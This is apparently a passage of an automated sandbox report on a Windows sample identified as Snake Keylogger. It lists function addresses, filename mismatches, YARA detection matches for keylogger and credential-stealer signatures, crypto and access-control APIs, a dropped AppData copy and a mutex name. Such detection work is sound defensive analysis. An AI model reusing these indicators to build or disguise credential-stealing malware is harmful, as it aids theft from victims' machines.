Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Code function: 23_2_00E4BEB0 23_2_00E4BEB0
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Code function: 23_2_00E4B4F3 23_2_00E4B4F3
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Code function: 23_2_00E43570 23_2_00E43570
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Code function: 23_2_00E4D7E0 23_2_00E4D7E0
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Code function: 23_2_00E4D7F0 23_2_00E4D7F0
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Code function: 23_2_064EEE0D 23_2_064EEE0D
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Code function: 23_2_064EA600 23_2_064EA600
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Code function: 23_2_064ED218 23_2_064ED218
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Code function: 23_2_064EB290 23_2_064EB290
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Code function: 23_2_064EBF30 23_2_064EBF30
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Code function: 23_2_064ECBD0 23_2_064ECBD0
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Code function: 23_2_064E8BF9 23_2_064E8BF9
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Code function: 23_2_064E9FB0 23_2_064E9FB0
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Code function: 23_2_064EAC48 23_2_064EAC48
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Code function: 23_2_064EB8E0 23_2_064EB8E0
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Code function: 23_2_064E0D48 23_2_064E0D48
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Code function: 23_2_064EC580 23_2_064EC580
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Code function: 23_2_064E85B0 23_2_064E85B0
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Code function: 23_2_064E5E63 23_2_064E5E63
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Code function: 23_2_064E5E70 23_2_064E5E70
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Code function: 23_2_064ED20A 23_2_064ED20A
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Code function: 23_2_064E5A08 23_2_064E5A08
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Code function: 23_2_064E5A18 23_2_064E5A18
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Code function: 23_2_064E62C8 23_2_064E62C8
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Code function: 23_2_064E36D8 23_2_064E36D8
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Code function: 23_2_064EB281 23_2_064EB281
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Code function: 23_2_064E62BC 23_2_064E62BC
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Code function: 23_2_064E3350 23_2_064E3350
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Code function: 23_2_064E6B69 23_2_064E6B69
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Code function: 23_2_064E3360 23_2_064E3360
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Code function: 23_2_064E6B78 23_2_064E6B78
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Code function: 23_2_064E6713 23_2_064E6713
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Code function: 23_2_064E6720 23_2_064E6720
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Code function: 23_2_064EBF20 23_2_064EBF20
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Code function: 23_2_064ECBC0 23_2_064ECBC0
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Code function: 23_2_064E43D8 23_2_064E43D8
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Code function: 23_2_064E6FE8 23_2_064E6FE8
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Code function: 23_2_064E6FF8 23_2_064E6FF8
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Code function: 23_2_064E9FA0 23_2_064E9FA0
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Code function: 23_2_064E2848 23_2_064E2848
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Code function: 23_2_064E7443 23_2_064E7443
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Code function: 23_2_064E0040 23_2_064E0040
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Code function: 23_2_064E2858 23_2_064E2858
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Code function: 23_2_064E7450 23_2_064E7450
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Code function: 23_2_064E0006 23_2_064E0006
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Code function: 23_2_064EAC38 23_2_064EAC38
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Code function: 23_2_064EB8D0 23_2_064EB8D0
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Code function: 23_2_064E08E3 23_2_064E08E3
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Code function: 23_2_064E08F0 23_2_064E08F0
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Code function: 23_2_064E7CF0 23_2_064E7CF0
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Code function: 23_2_064E048B 23_2_064E048B
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Code function: 23_2_064E0498 23_2_064E0498
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Code function: 23_2_064E7898 23_2_064E7898
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Code function: 23_2_064E78A8 23_2_064E78A8
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Code function: 23_2_064E8148 23_2_064E8148
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Code function: 23_2_064E5140 23_2_064E5140
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Code function: 23_2_064E8158 23_2_064E8158
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Code function: 23_2_064E7D00 23_2_064E7D00
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Code function: 23_2_064E5132 23_2_064E5132
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Code function: 23_2_064E55C0 23_2_064E55C0
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Code function: 23_2_064EA5F0 23_2_064EA5F0
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Code function: 23_2_064E85A0 23_2_064E85A0
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Code function: 23_2_064E55B3 23_2_064E55B3
Sample file is different than original file name gathered from version info
Source: rPO0977-6745.exe, 00000000.00000002.1269716508.0000000007AF0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs rPO0977-6745.exe
Source: rPO0977-6745.exe, 00000000.00000002.1265411156.00000000031E2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs rPO0977-6745.exe
Source: rPO0977-6745.exe, 00000000.00000002.1265411156.0000000003191000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMML.dll2 vs rPO0977-6745.exe
Source: rPO0977-6745.exe, 00000000.00000002.1269312829.0000000007820000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMML.dll2 vs rPO0977-6745.exe
Source: rPO0977-6745.exe, 00000000.00000002.1265815072.00000000041F9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs rPO0977-6745.exe
Source: rPO0977-6745.exe, 00000000.00000002.1265815072.000000000436E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs rPO0977-6745.exe
Source: rPO0977-6745.exe, 00000000.00000002.1263660255.00000000013EE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs rPO0977-6745.exe
Source: rPO0977-6745.exe, 00000000.00000000.1225855306.0000000000CFC000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameikFw.exeD vs rPO0977-6745.exe
Source: rPO0977-6745.exe, 0000000A.00000002.3686556908.0000000000F77000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: OriginalFilenameUNKNOWN_FILET vs rPO0977-6745.exe
Source: rPO0977-6745.exe, 0000000A.00000002.3686100091.0000000000402000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs rPO0977-6745.exe
Source: rPO0977-6745.exe Binary or memory string: OriginalFilenameikFw.exeD vs rPO0977-6745.exe
Uses 32bit PE files
Source: rPO0977-6745.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 11.2.EDyxAgkldisLe.exe.3a7de48.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 11.2.EDyxAgkldisLe.exe.3a7de48.2.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 11.2.EDyxAgkldisLe.exe.3a7de48.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 11.2.EDyxAgkldisLe.exe.3a7de48.2.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.rPO0977-6745.exe.41f9670.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.rPO0977-6745.exe.41f9670.3.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.rPO0977-6745.exe.41f9670.3.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.rPO0977-6745.exe.41f9670.3.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 11.2.EDyxAgkldisLe.exe.3a5d428.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 11.2.EDyxAgkldisLe.exe.3a5d428.1.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 11.2.EDyxAgkldisLe.exe.3a5d428.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 11.2.EDyxAgkldisLe.exe.3a5d428.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.rPO0977-6745.exe.421a090.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.rPO0977-6745.exe.421a090.2.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.rPO0977-6745.exe.421a090.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.rPO0977-6745.exe.421a090.2.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 11.2.EDyxAgkldisLe.exe.3a7de48.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 11.2.EDyxAgkldisLe.exe.3a7de48.2.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.rPO0977-6745.exe.421a090.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 11.2.EDyxAgkldisLe.exe.3a7de48.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 11.2.EDyxAgkldisLe.exe.3a7de48.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.rPO0977-6745.exe.421a090.2.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.rPO0977-6745.exe.421a090.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.rPO0977-6745.exe.421a090.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.rPO0977-6745.exe.41f9670.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.rPO0977-6745.exe.41f9670.3.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.rPO0977-6745.exe.41f9670.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.rPO0977-6745.exe.41f9670.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 11.2.EDyxAgkldisLe.exe.3a5d428.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 11.2.EDyxAgkldisLe.exe.3a5d428.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 11.2.EDyxAgkldisLe.exe.3a5d428.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 11.2.EDyxAgkldisLe.exe.3a5d428.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0000000A.00000002.3686100091.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000A.00000002.3686100091.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000000.00000002.1265815072.00000000041F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1265815072.00000000041F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0000000B.00000002.1307021274.0000000003A5D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000B.00000002.1307021274.0000000003A5D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: rPO0977-6745.exe PID: 1540, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: rPO0977-6745.exe PID: 1540, type: MEMORYSTR Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: rPO0977-6745.exe PID: 2916, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: rPO0977-6745.exe PID: 2916, type: MEMORYSTR Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: EDyxAgkldisLe.exe PID: 7276, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: EDyxAgkldisLe.exe PID: 7276, type: MEMORYSTR Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: rPO0977-6745.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: EDyxAgkldisLe.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.rPO0977-6745.exe.41f9670.3.raw.unpack, ---.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.rPO0977-6745.exe.41f9670.3.raw.unpack, ---.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.rPO0977-6745.exe.41f9670.3.raw.unpack, k-.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.rPO0977-6745.exe.41f9670.3.raw.unpack, k-.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.rPO0977-6745.exe.421a090.2.raw.unpack, ---.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.rPO0977-6745.exe.421a090.2.raw.unpack, ---.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.rPO0977-6745.exe.421a090.2.raw.unpack, k-.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.rPO0977-6745.exe.421a090.2.raw.unpack, k-.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.rPO0977-6745.exe.41f9670.3.raw.unpack, k-.cs Base64 encoded string: 'OqHzioSHceQ5qotdqa7Ykbba4f6uJp4tWTCMtVxXkiuCL74BelCp1pditD457DF8'
Source: 0.2.rPO0977-6745.exe.421a090.2.raw.unpack, k-.cs Base64 encoded string: 'OqHzioSHceQ5qotdqa7Ykbba4f6uJp4tWTCMtVxXkiuCL74BelCp1pditD457DF8'
Source: 0.2.rPO0977-6745.exe.4509750.1.raw.unpack, u5QKsh8eHYOmOLmsMj.cs Security API names: _0020.SetAccessControl
Source: 0.2.rPO0977-6745.exe.4509750.1.raw.unpack, u5QKsh8eHYOmOLmsMj.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.rPO0977-6745.exe.4509750.1.raw.unpack, u5QKsh8eHYOmOLmsMj.cs Security API names: _0020.AddAccessRule
Source: 0.2.rPO0977-6745.exe.7af0000.8.raw.unpack, t2qt23C1ZO7pYQfAKA.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.rPO0977-6745.exe.44a7330.4.raw.unpack, u5QKsh8eHYOmOLmsMj.cs Security API names: _0020.SetAccessControl
Source: 0.2.rPO0977-6745.exe.44a7330.4.raw.unpack, u5QKsh8eHYOmOLmsMj.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.rPO0977-6745.exe.44a7330.4.raw.unpack, u5QKsh8eHYOmOLmsMj.cs Security API names: _0020.AddAccessRule
Source: 0.2.rPO0977-6745.exe.4509750.1.raw.unpack, t2qt23C1ZO7pYQfAKA.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.rPO0977-6745.exe.7af0000.8.raw.unpack, u5QKsh8eHYOmOLmsMj.cs Security API names: _0020.SetAccessControl
Source: 0.2.rPO0977-6745.exe.7af0000.8.raw.unpack, u5QKsh8eHYOmOLmsMj.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.rPO0977-6745.exe.7af0000.8.raw.unpack, u5QKsh8eHYOmOLmsMj.cs Security API names: _0020.AddAccessRule
Source: 0.2.rPO0977-6745.exe.44a7330.4.raw.unpack, t2qt23C1ZO7pYQfAKA.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@21/15@4/3
Source: C:\Users\user\Desktop\rPO0977-6745.exe File created: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Mutant created: NULL
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Mutant created: \Sessions\1\BaseNamedObjects\oXIdkGfpRvwWacgDRTNLtqu
